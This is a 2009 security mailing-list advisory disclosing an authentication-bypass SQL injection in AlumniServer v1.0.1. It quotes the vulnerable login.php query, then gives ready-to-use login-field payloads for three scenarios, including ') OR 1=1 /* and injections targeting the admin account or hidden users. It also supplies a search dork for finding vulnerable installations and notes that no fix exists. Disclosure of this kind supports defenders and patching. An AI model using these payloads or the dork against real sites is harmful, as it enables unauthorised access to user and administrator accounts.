SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



---------------------------------------------------------
SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->
---------------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
		and companies. Services for usersinclude profile page,...
-->RELEASED: 2009-06-11

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "AlumniServer project"
-->CATEGORY: AUTH-BYPASS (SQLi)
-->AFFECT VERSION: CURRENT
-->Discovered Bug date: 2009-06-16
-->Reported Bug date: 2009-06-16
-->Fixed bug date: N/A
-->Info patch (????): N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#####################
////////////////////

AUTH-BYPASS (SQLi):

////////////////////
#####################



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>



-----------
VULN FILE:
-----------



Path --> [HOME_PATH]/login.php
Lines --> 26, 32, 72


//Note: requestVar is a function against LFI and XSS mainly, 
//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars.


...

26:  $email=requestVar('login','',true);

...

32:  $pwd=requestVar('password','',true);

...

72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line

...


-----------
EXPLOITS:
-----------



[!!!] Case-1: If only one user (rarely)...


~~~~~> E-Mail=y3nh4ck3r@xxxxxxxxx') OR 1=1 /*
~~~~~> Password=nothing


[!!!] Case-2: If more users...


[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php):


~~~~~> E-Mail=[real_admin_mail]')/*
~~~~~> Password=nothing


[++] Note: Search for first or second name.
[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user 
	is easy to get necessary information.


~~~~~> E-Mail=y3nh4ck3r@xxxxxxxxx') OR gn='AdminGn' /*
~~~~~> Password=nothing


[!!!] Case-3: If admin is a hidden user...


~~~~~> E-Mail=y3nh4ck3r@xxxxxxxxx') OR hideuser='y' /*
~~~~~> Password=nothing




#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux